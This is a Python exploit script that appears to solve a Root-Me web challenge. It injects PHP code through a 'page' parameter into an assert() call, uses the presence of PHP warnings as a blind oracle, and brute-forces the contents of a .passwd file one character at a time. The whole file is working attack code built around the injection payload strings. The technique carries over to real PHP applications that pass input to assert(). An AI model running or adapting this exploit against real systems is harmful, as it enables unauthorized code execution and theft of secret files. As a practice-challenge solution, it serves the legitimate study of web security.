assert_lfi.py

import base64
import string
import requests
import urllib

url = "http://challenge01.root-me.org/web-serveur/ch47/"
s = requests.Session()


def login():
    params = urllib.parse.urlencode({'login':'xxxxxx', 'password':'xxxxxxxx'})
    r = s.get("http://api.www.root-me.org/login", params=params)

def check(payload):
    params = urllib.parse.urlencode({'page':payload})
    r = s.get(url, params=params)
    return "Warning" not in r.text

def get_len():
    i = 50
    while True:
        payload = "', '.7.') === false && strlen(file_get_contents(\".passwd\")) ==" + str(i) + " && strpos('o"
        if(check(payload)):
            return i
        i += 1


def read_file_contents():
    length = get_len()
    s = ""
    for i in range(length):
        for c in string.printable:
            payload = "', '.7.') === false && substr(file_get_contents(\".passwd\"),"+ str(i) +", 1) ==" + "'" + c + "'" + " && strpos('o"
            if(check(payload)):
                s += c
                break
    return s

login()

print(read_file_contents())